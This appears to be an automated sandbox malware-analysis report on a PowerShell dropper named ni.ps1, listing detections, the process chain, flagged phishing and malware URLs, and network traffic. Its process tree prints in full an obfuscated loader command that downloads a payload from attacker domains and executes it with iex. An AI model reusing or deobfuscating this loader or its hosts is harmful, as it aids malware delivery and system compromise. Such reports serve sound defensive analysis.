Windows Analysis Report
ni.ps1

Overview

General Information

Sample name: ni.ps1
Analysis ID: 1568993
MD5: bbaa2ede1a42e0a17b6a1b1ebc59eb07
SHA1: eff8193f408c8f81eacbee310582b31ca4d9f014
SHA256: 077934deadb778ea2b87fad0bd565dd9bfb85c4c30604aaa5be014d305964466
Tags: Listofrequireditems, ps1, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • powershell.exe (PID: 7164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 5504 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 2956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. 
DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. 
CollsDabbnp uperl ,onriAdmistReas,(Gyroc$SubpoSTimaly ouchnA tindAadalsUnextbSvidueIldstk .rcae.hicqnDressdSla,ge Re.llDriftsLyskoeDaadynVur es U or)Bugg ');responsibly (Psykopaterne 'Discr[NondeN,ungeeAletht .nds.DeleaSBal,ueArketrShehivIrideiAliptcSynodeOverfPHandeoIlyusi BurenBj,intHnekyMNonsua isagn Cycaa utohgBartoeReendrf eda]Obser:Blurr:NulpuSMegaleSubclcCalorubronzr.hanti.eniltF,iery eavP LiftrUndeeoDragetRenteoTwi,ocTvenloProfelSejer P,str= ttr S.mme[ RegrNBuldeeCompatVener.Sukk,STh aseBealtcMar euepir,r VsbeisindetRumleyUnmirP IronrNo,deoA,hngtTrskeoDistac Udrro,adaylFir,cTfl.etyUnderpHearteMalaw]Dtres:,ifto: lkicTGa,ralNu,mesMudfl1Pante2Mainl ');$Orloven=$Crackajack[0];$Immuniseringer= (Psykopaterne 'forpl$ agakg VanvlSuspeo,nindbUnsecaInjurl Slav:Lsl dS Miliq Formu Va.ea Ch.il Drjhl PosteSnerprSolta=PlayrNBehole Re,iwKrag,-FlaggO rotbPulvejtabiaeBe,eacSkakstUds i Ye.rbSKininyMyatrsOb,eqt Bl,keCaesam epr.DeparN ,rojepredotSnedk.RetsaW KajaeNapkibOutsiCChl,rlSuba.i selveWatapn yelt');$Immuniseringer+=$Boere[1];responsibly ($Immuniseringer);responsibly (Psykopaterne ' Ren,$BrndsSEft,rqSkambuLil,ia RamtlAfterlDelage LeverModul. 
BergH Ken,eInspea VenddMdeafeUb,harAmarysScab,[Eremi$ BellHSpeciiEnedir ankf]Guldm= Stvk$prefiSUnletkmolluoSkrfnv TelttArcharTipsfeWhuzkr MagnnUdetje FikssS eka ');$Syndromic=Psykopaterne 'Twini$UvisnSSeitfqhyggeuPara,aKoo dlB,lsal,alose harmrHvsse.Un,waDLeonao ge fw DiabnMaconlBagtaoKompraTiltbd .limFdidasiRiposlVsenseMyr a(Menne$ OrieOOverfrDiskulSkjoroTimidvTaalteUdru nImpas, Spir$ScyppGRe,rieDishon fodheGookscPiluloR,ncilDruseo,ulemg VideiGstgicMiskra StanlPrlimlShellyFi,tr1 utcr4Attri9Prear) Mone ';$Genecologically149=$Boere[0];responsibly (Psykopaterne 'Eperv$De oyg Metal forho UtydbSlariaRaahulEngra: And.P PipirRadixeFien,pNonoprTowl.o FrisvFinanoBetynkBuntiePermidche s=.kken(AnthrTRe toe JurisCochltIndda-NonbuPSuperaOn.idtRockrhEpi l Ke s$aandeGK,rtoe.ominncolibeSupercAnd.tojobmulKonseoWorsegAntroi trancSaddlaSkvallDy.phlBankrySolid1 Ung.4Stenk9 Kard)Sonn. ');while (!$Preprovoked) {responsibly (Psykopaterne 'Cel,b$Race gG.rerl Tolbo PeribCroo.aToc al raft: .ifeCPeache WiglnInopetLig,rrStanciTupmasBeribt UdstiMetacsSammekAdmiseDemiw= S,li$Endevt,hasirFrugtuFormeeThund ') ;responsibly $Syndromic;responsibly (Psykopaterne 'AuktiS UrsitRestaa,osperSyntht F er-FilmiSKamsmlborgee Zar,e overpSkimm Rec o4Lings ');responsibly (Psykopaterne 'Onrus$ ,ejrgMimidlFaldeoBenytbB.ndaaCongrl ,rim:SolomPBagderPrio.eVrkmepwi nerRepugo.utinvAperioG.melkDys.ce Gal,d Iber=Bukni(appelTFormkeSpandsTortutAabni-fructP wasaa GonatTrysah Nord Regal$ istGE.gareEnchonCan,geTronsc FrdioDrg.ilskattoMat,hgOpdrtiDisalcAktivaParkelUdsm lModsty Pre 1Backw4Under9 Na,i) Konv ') ;responsibly (Psykopaterne ' Bee.$ yperg,iplal emato As,ebH,steaHepatlM.red:MandsLB,saaiT,ackn PredjNon.aeElselts,atteO,gragK llen Gli iG sponM rosgBesposLsegr=Afhng$Ga,leg MelllFrithoWosombTillia tayslWhi p: RadiIUdviknDryptgvis,rrBe vaipantnd Subr1Glot,3Skrun0Cultu+Udtry+ B,pi%Edvi.$Kur bCUnsparF.stlaForsac LsepkFinanaAfsvajIodocaTemp,cTaksok Phyl.MiliecUdm.to InfouRuttinTusint Arge ') 
;$Orloven=$Crackajack[$Linjetegnings];}$Araliaceae=290259;$Miljkvalitetsplanlgningers=29639;responsibly (Psykopaterne 'Natio$Omdb gSoleslapp ioGourmbAnimaa TrivlLsefa:AlterPKlknioErstasSlumbtCountoDomflf.ommafUnderiAlterc I dbeKonto1Udfyl6Etymo9 Micr Cont=Skuff LametGG,dmueReligt ,mor-GrftnCPhotooCollinTeo,otPigmee.unjanGreyltD,bit D.ops$ .verGAtticeFri,enMotoremuskecL,jemoRegnil Tango S,argNorthiLselacAirifaUngdolSejerlJudi yurb,n1Acros4Pha.o9Overd ');responsibly (Psykopaterne 'silen$B,vgegProsolRiddeoBr,llbyokepa.algrlUndis:UnnapUWahidrShipreKombitOverghvalidrBrudsoMilitsaconit AbhoaR,prix,nteri D.tos Indf Baand=Unecs Yelli[StrenS.snoby Tomms duest enneeGoka.m Synk.GrinnCEdmunoU.dernLotu.vHygroeParejrUnchatNucle]Softe:Ordfr:CorpoFAttrarTota,ofr.dem esigB oncoaLandssSkalpePaa t6Upa.t4.olypSnonblt Lo,irJapaniDenunnStategAbacn(lockh$LauraPByrdeoCap is f akt P,aloOve.bfshogufhyp piFolkecSpendeTusay1Winte6Udsta9M,nha),teno ');responsibly (Psykopaterne 'Diffe$D kregBagerlVitrio Tungb ProsaU sanlInds,: GunsPEj.ndealfierNatalsMym.reUltracFormeuUn.artPrenaeo,onodV,ren Bleac=Mi be Procu[ sin SRooftyGhostsCamsht S.epeilbudmFulme..nplaT C,anePeracxIndvetSoedm. ictaENonsyn W,ldc aissoRequadkidnai Agr,nFevergOmpro] sept:Indst:linjeASt liSMedieCEjendIA.klaI Jitt.BibraGSli keRykketNota SDismatA mbrr ,proiPigt.nimporgQuarr(Droge$ TilrUVermir AnsgeMyelotBre.th,unstrmontao Grins U,retForesaAntinxPoteniG anasGenbr)Welle ');responsibly (Psykopaterne ' Aest$KumpagregenlUroceoBrisabPinliaSlettl Scar:.krudK eneto ForansikkevOp ageIllegn ReintStrop=P.nce$SaproPAfspae Bewrr.tomssBrutteEftercStranuperistPrecie,patldDyrke.Beskys uchfu ikrbgenersJovict Unl rpaal,iForlon relsgNr,ed( Anti$ansaeA.vmmer ,dveaCa.ill loseiAnaesaSleepcFaiteeSyncoa Pecheerran,A,std$ChansMAffrii BratlMa,hejAflbskHorotvToleraS temlTokr.istrobtBriefestr ttUdstysOrchepBam ul U deaInkvin Shu lC.nchg Cab.nStegeiTudesnDros gI.hereDe ucrNo.spsParac) Abol ');responsibly $Konvent;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7064 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7164 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 2956 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7164.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_2956.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'", ProcessId: 4768, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7164, TargetFilename: C:\Users\Public\eji.vbs
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ProcessId: 7164, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7164, TargetFilename: C:\Users\Public\eji.vbs
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ProcessId: 7164, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T10:38:35.861453+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49745 | 148.251.114.233 | 443 | TCP

AV Detection

Source: ni.ps1 | Avira: detected
Source: https://www.erp-royal-crown.info/wh/Sar | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarothrum.j | Avira URL Cloud: Label: phishing
Source: https://www.pineappletech.ae/ov/wh.vbs | Avira URL Cloud: Label: malware
Source: https://www.erp-royal-crown.info/wh/Sarothrum. | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarothr | Avira URL Cloud: Label: phishing
Source: http://erp-royal-crown.info | Avira URL Cloud: Label: phishing
Source: http://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarothru | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarothrum.jp | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarothrum.jpb | Avira URL Cloud: Label: malware
Source: https://www.erp-royal-crown.info/wh/ | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarot | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sa | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Saro | Avira URL Cloud: Label: phishing
Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | Avira URL Cloud: Label: malware
Source: https://www.erp-royal-crown.info/ | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sarothrum | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/w | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/S | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Saroth | Avira URL Cloud: Label: phishing
Source: ni.ps1 | ReversingLabs: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.2% probability
Source: unknown | HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb'J | source: powershell.exe, 00000003.00000002.2189957906.000001DAB563D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000003.00000002.2220195093.000001DACF904000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?m.pdbpdbtem.pdb | source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb | source: powershell.exe, 00000000.00000002.2412345329.0000023976E45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.pdbe | source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbn | source: powershell.exe, 00000000.00000002.2414714485.0000023977170000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000000.00000002.2414714485.000002397712C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3496836394.00000263D8BFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb" | source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdbk | source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpdblib.pdb | source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X | source: powershell.exe, 00000003.00000002.2219771232.000001DACF8A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb | source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.pdbc | source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb | source: powershell.exe, 00000007.00000002.3496836394.00000263D8C5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb | source: powershell.exe, 00000007.00000002.3493312845.00000263D8A59000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | HTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.fornid.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ov/wh.vbs HTTP/1.1 | Host: www.pineappletech.ae | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 148.251.114.233 148.251.114.233
